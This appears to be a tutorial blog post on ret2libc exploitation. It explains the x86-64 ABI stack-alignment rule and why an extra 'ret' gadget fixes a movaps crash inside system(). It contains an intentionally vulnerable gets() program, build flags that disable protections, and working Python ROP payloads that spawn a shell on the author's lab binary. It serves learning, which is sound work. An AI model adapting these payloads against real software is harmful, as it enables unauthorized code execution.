While learning about ret2libc exploitation, I ran into a stack alignment issue that initially confused me. After some time debugging, I finally understood why the solution needs that extra ret instruction. I thought it would be worth sharing this insight, in case it helps someone facing the same problem.
Let's look at the memory layout.
Our main interest right now is the stack!
The stack is a part of memory used for:
- Function calls (return addresses)
- Function arguments (only when a function has more than 6 arguments)
- Local variables
The first 6 integer or pointer arguments are passed in registers (RDI, RSI, RDX, RCX, R8, R9, in that order); any remaining arguments go on the stack.
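To make the register rule concrete, here is a small sketch that maps argument positions to where they are passed. The function name place_int_args and the stack[n] labels are my own illustration, and it only models integer or pointer arguments, not floating-point ones.

```python
# System V AMD64 integer/pointer argument registers, in order.
INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def place_int_args(count):
    """Return where each of `count` integer/pointer arguments is passed."""
    places = []
    for i in range(count):
        if i < len(INT_ARG_REGS):
            places.append(INT_ARG_REGS[i])
        else:
            # Hypothetical label for the n-th 8-byte argument slot on the stack.
            places.append(f"stack[{i - len(INT_ARG_REGS)}]")
    return places

print(place_int_args(1))  # system("/bin/sh") takes one argument, so only rdi matters
print(place_int_args(8))  # the 7th and 8th arguments spill onto the stack
```

This is why a ret2libc chain for system() only needs a gadget that controls RDI.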
To follow the rest of this article, you should already be familiar with buffer overflows and ret2libc attacks.
#include <stdio.h>
#include <stdlib.h>

// Vulnerable function
void vuln_func() {
    char buffer[8]; // Small buffer (8 bytes)
    puts("The buffer is small now, enter some data:");
    // gets() is unsafe and causes buffer overflows.
    gets(buffer);
}

int main() {
    puts("Calling vulnerable function...");
    vuln_func();
    return 0;
}
all:
	gcc -no-pie -fno-stack-protector vulnerable.c -o vulnerable -D_FORTIFY_SOURCE=0 -std=c99
clean:
	rm -f vulnerable
This Makefile compiles vulnerable.c with exploitation-friendly settings.
+-------------------------------------------------------------+
|                    GCC Compilation Flags                    |
+------------------------+------------------------------------+
| Flag                   | Description                        |
+------------------------+------------------------------------+
| -no-pie                | Disables PIE (Position-Independent |
|                        | Executable).                       |
|                        | Ensures fixed memory addresses in  |
|                        | the binary (e.g., main, puts).     |
+------------------------+------------------------------------+
| -fno-stack-protector   | Disables stack canary protection.  |
|                        | Allows buffer overflows without    |
|                        | detection.                         |
+------------------------+------------------------------------+
| -D_FORTIFY_SOURCE=0    | Turns off extra glibc checks for   |
|                        | functions like gets(), strcpy().   |
|                        | Prevents automatic abort on unsafe |
|                        | operations.                        |
+------------------------+------------------------------------+
| -std=c99               | Compiles using the C99 standard,   |
|                        | which still declares gets()        |
|                        | (removed from the C11 standard).   |
+------------------------+------------------------------------+
| -z execstack (missing) | This flag is NOT included here.    |
|                        | It would allow execution on stack  |
|                        | (needed for shellcode sometimes).  |
|                        | This binary has non-executable     |
|                        | stack (default in modern Linux).   |
+------------------------+------------------------------------+
File: exploit.py
import struct

libc_base = 0x7ffff7da9000
payload = b"A" * 8  # fills the 8-byte buffer, up to saved rbp
payload += b"B" * 8  # overwrites saved rbp
payload += struct.pack("<Q", libc_base + 0x000000000002a145)  # pop rdi; ret;
payload += struct.pack("<Q", 0x7ffff7f50ea4)  # address of "/bin/sh"
payload += struct.pack("<Q", 0x7ffff7dfc110)  # address of system()
payload += struct.pack("<Q", 0x7ffff7deb340)  # address of exit()

# "<Q" packs each 64-bit address as an unsigned little-endian value

# print(payload)
with open("exploit1", "wb") as f:
    f.write(payload)

print("Payload written to exploit1. Run with: `./vulnerable < exploit1`")
This is the exploit I wrote while performing a ret2libc attack. The goal is to call the system() function with "/bin/sh" as its argument in order to spawn a shell. To do this, we use a ROP gadget, specifically pop rdi; ret, which loads the address of the "/bin/sh" string into the RDI register, as required by the x86-64 calling convention (where the first function argument is passed via RDI).
After setting up the argument, we place the address of the system() function in the chain, which will be executed next. Finally, we include the address of the exit function so that once system() returns, the program exits cleanly without crashing.
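Before going into the debugger, it can help to check the payload layout offline. The sketch below rebuilds the same bytes and splits them back into 64-bit values; the helper name qwords is my own, and the addresses are the ones from my run, so they will differ on your system.

```python
import struct

# Values copied from exploit.py; they are specific to the author's libc and run.
payload = b"A" * 8 + b"B" * 8
payload += struct.pack("<Q", 0x7ffff7da9000 + 0x2a145)  # pop rdi; ret
payload += struct.pack("<Q", 0x7ffff7f50ea4)            # "/bin/sh"
payload += struct.pack("<Q", 0x7ffff7dfc110)            # system
payload += struct.pack("<Q", 0x7ffff7deb340)            # exit

def qwords(data):
    """Split a byte string into little-endian 64-bit values."""
    return [value for (value,) in struct.iter_unpack("<Q", data)]

# Print each 8-byte slot with its offset from the start of the buffer.
for index, value in enumerate(qwords(payload)):
    print(f"+{index * 8:#04x}: {value:#018x}")
```

The slot at offset 0x10 is the one that overwrites the saved return address, so that is where the chain starts executing.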
pwndbg> disassemble vuln_func
pwndbg> break *0x000000000040115b
or
pwndbg> break *vuln_func + 37
Run the binary with the exploit we wrote above.
We hit the breakpoint.
The stack looks perfect:
────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdc28 —▸ 0x7ffff7dd3145 (iconv+181) ◂— pop rdi
01:0008│ 0x7fffffffdc30 —▸ 0x7ffff7f50ea4 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:0010│ 0x7fffffffdc38 —▸ 0x7ffff7dfc110 (system) ◂— test rdi, rdi
03:0018│ 0x7fffffffdc40 —▸ 0x7ffff7deb340 (exit) ◂— sub rsp, 8
Stack diagram
             ┌────────────────────────────────────────────┐
Low addr  →  │ "AAAA AAAA" (8-byte padding)               │
             ├────────────────────────────────────────────┤
             │ "BBBB BBBB" (fake saved RBP)               │
             ├────────────────────────────────────────────┤
             │ 0x7fffffffdc28 → pop rdi ; ret (libc)      │ ← first RET jumps here
             ├────────────────────────────────────────────┤
             │ 0x7fffffffdc30 → "/bin/sh" string          │ ← popped into RDI
             ├────────────────────────────────────────────┤
             │ 0x7fffffffdc38 → system()                  │ ← second RET jumps here
             ├────────────────────────────────────────────┤
             │ 0x7fffffffdc40 → exit()                    │ ← system() returns here
High addr →  └────────────────────────────────────────────┘
I had some glitches in pwndbg, so I switched to gef.
rdi: 0x00007ffff7f50ea4 → 0x0068732f6e69622f ("/bin/sh"?)
Calling the system function:
$rip : 0x00007ffff7dfc110 → <system+0000> test rdi, rdi
Everything was fine until we hit this:
► 0x7ffff7dfbdf4 <do_system+356> movaps xmmword ptr [rsp + 0x50], xmm0 <[0x7fffffffd8e8] not aligned to 16 bytes>
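The debugger message can be checked by hand. This is a minimal sketch using only the address printed above; the helper name movaps_operand_ok is my own.

```python
def movaps_operand_ok(address):
    """movaps with a memory operand needs a 16-byte aligned address."""
    return address % 16 == 0

fault_addr = 0x7fffffffd8e8   # [rsp + 0x50] as reported by the debugger
rsp = fault_addr - 0x50       # rsp inside do_system at the faulting instruction

print(hex(rsp), rsp % 16)             # rsp is off by 8 from a 16-byte boundary
print(movaps_operand_ok(fault_addr))  # False, so movaps faults
```

Since 0x50 is itself a multiple of 16, the operand can only be aligned if rsp is aligned, which is why the fault points back at the stack pointer.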
I found a few articles online discussing this issue; I am sharing them here for your reference:
https://security.stackexchange.com/questions/278592/ret2libc-exploit-not-working-but-it-seems-correct-in-gdb#:~:text=There%20is%20a%20great%20chance,stack%20may%20not%20aligned%20propertly
https://c9x.me/compile/doc/abi.html#:~:text=The%20ABI%20is%20unclear%20on,0%20mod%2016
https://stackoverflow.com/questions/67243284/why-movaps-causes-segmentation-fault#:~:text=%3E%20MOVAPS%E2%80%94Move%20Aligned%20Packed%20Single,GP%29%20will%20be%20generated
The key is that when system() is entered, the stack pointer %rsp must satisfy the AMD64 ABI's alignment requirements. By the AMD64 ABI, %rsp must be 16-byte aligned at every call instruction.
Before any call instruction, %rsp must be a multiple of 16:
"Just before call, %rsp % 16 == 0. On function entry, %rsp % 16 == 8."
%rsp ≡ 0 mod 16 ----> rsp % 16 = 0
In other words, the value of rsp must be a multiple of 16.
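The two halves of that rule can be written as simple checks. This is only a sketch; the function names and the sample rsp value are my own and are not taken from the debugger session.

```python
def aligned_before_call(rsp):
    """ABI rule: rsp is a multiple of 16 right before a call instruction."""
    return rsp % 16 == 0

def aligned_at_entry(rsp):
    """After call pushes the 8-byte return address, rsp is 8 mod 16."""
    return rsp % 16 == 8

rsp = 0x7fffffffe000                 # illustrative value only
print(aligned_before_call(rsp))      # True
print(aligned_at_entry(rsp - 8))     # True: the return address was pushed
print(aligned_at_entry(rsp))         # False: this is the misaligned case
```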
Let's go back to our vulnerable binary and run it again inside gdb.
We hit the breakpoint at the ret instruction.
ret takes the address of our pop rdi ; ret gadget off the stack and loads it into rip.
gef➤ si
Remember that rule?
"Just before call, %rsp % 16 == 0. On function entry, %rsp % 16 == 8."
Just before control is transferred to system(), %rsp % 16 should be 0, but we are getting:
gef➤ !python3 -c 'print(0x00007fffffffdd08 % 16)'
8
That's where the problem is.
Now we are at the entry of the system function.
The ABI expects %rsp % 16 == 8 on function entry, but we are getting %rsp % 16 == 0.
Correct Stack Alignment:
rsp % 16 = 8 <- This is what the ABI expects after 'call'
system() works fine
Misaligned Stack:
rsp % 16 = 0 <- Due to raw ROP chain
and you get that movaps issue
When you normally call a function on x86_64, the call instruction does the following under the hood:
call target
- Pushes the return address (8 bytes) onto the stack
- Decrements rsp by 8 (the stack grows downward)
- Jumps to target
Inside the callee, on entry you see rsp % 16 == 8, exactly what the ABI expects.
However, in a ROP chain you don't use call; you stitch together a series of ret instructions instead. Each ret does:
- Pops the top 8 bytes from the stack into the instruction pointer
- Increments rsp by 8 (the stack "shrinks" upward)
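The two lists above boil down to rsp moving by 8 in opposite directions. Here is a toy model of that, using made-up addresses; after_call and after_ret are hypothetical helper names, and the model ignores everything except rsp.

```python
def after_call(rsp):
    """call pushes an 8-byte return address, so rsp goes down by 8."""
    return rsp - 8

def after_ret(rsp):
    """ret pops 8 bytes into rip, so rsp goes up by 8."""
    return rsp + 8

# Normal call: the caller keeps rsp 16-byte aligned before the call.
caller_rsp = 0x7fffffffe000          # illustrative value only
print(after_call(caller_rsp) % 16)   # 8, what the callee expects

# ROP: rsp points at the slot holding the target address when ret runs.
slot_bad = 0x7fffffffe008            # slot address is 8 mod 16
slot_good = 0x7fffffffe010           # slot address is 0 mod 16
print(after_ret(slot_bad) % 16)      # 0, misaligned on entry
print(after_ret(slot_good) % 16)     # 8, aligned on entry
```

So whether a function reached through ret sees a correctly aligned stack depends only on which slot of the chain holds its address.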
Therefore, if you build a ROP chain without caring about alignment, each gadget's ret adds 8 to rsp. By the time you reach system(), rsp can be a multiple of 16 (i.e. rsp % 16 == 0), which the ABI does not allow on function entry. glibc then executes a movaps on the misaligned stack inside do_system and you get a General Protection Fault, which Linux reports as a segmentation fault. Adding one extra ret gadget to the chain pops one more 8-byte slot, shifting rsp by 8 so that rsp % 16 == 8 again when system() starts.
Updated Exploit
File: exploit.py
import struct

libc_base = 0x7ffff7da9000
payload = b"A" * 8  # fills the 8-byte buffer, up to saved rbp
payload += b"B" * 8  # overwrites saved rbp
payload += struct.pack("<Q", libc_base + 0x00000000000f7bb3)  # ret; (alignment gadget)
payload += struct.pack("<Q", libc_base + 0x000000000002a145)  # pop rdi; ret;
payload += struct.pack("<Q", 0x7ffff7f50ea4)  # address of "/bin/sh"
payload += struct.pack("<Q", 0x7ffff7dfc110)  # address of system()
payload += struct.pack("<Q", 0x7ffff7deb340)  # address of exit()

# "<Q" packs each 64-bit address as an unsigned little-endian value

# print(payload)
with open("exploit1", "wb") as f:
    f.write(payload)

print("Payload written to exploit1. Run with: `./vulnerable < exploit1`")
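To see the effect of the extra gadget without a debugger, we can compute rsp at the entry of system() for both chains. This is a rough sketch: it assumes the chain starts at 0x7fffffffdc28 (the rsp value from the pwndbg stack dump earlier) in both runs, and the names rsp_at_entry, original and fixed are my own.

```python
CHAIN_START = 0x7fffffffdc28   # rsp at vuln_func's ret, from the earlier stack dump

# Each list entry stands for one 8-byte slot of the chain.
original = ["pop rdi; ret", "/bin/sh", "system", "exit"]
fixed = ["ret"] + original

def rsp_at_entry(chain, target, start=CHAIN_START):
    """rsp when `target` starts executing: every slot up to and including
    the one holding the target's address has been popped, 8 bytes each."""
    slots_consumed = chain.index(target) + 1
    return start + 8 * slots_consumed

for name, chain in (("original", original), ("fixed", fixed)):
    rsp = rsp_at_entry(chain, "system")
    print(f"{name}: rsp={rsp:#x} rsp%16={rsp % 16}")
```

With these assumptions, the original chain enters system() with rsp % 16 == 0, while the chain with the extra ret enters it with rsp % 16 == 8, matching what the ABI expects.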
Let's verify our exploit.
I hope you now understand the stack alignment problem and why we use that extra ret gadget.
Happy hacking ;)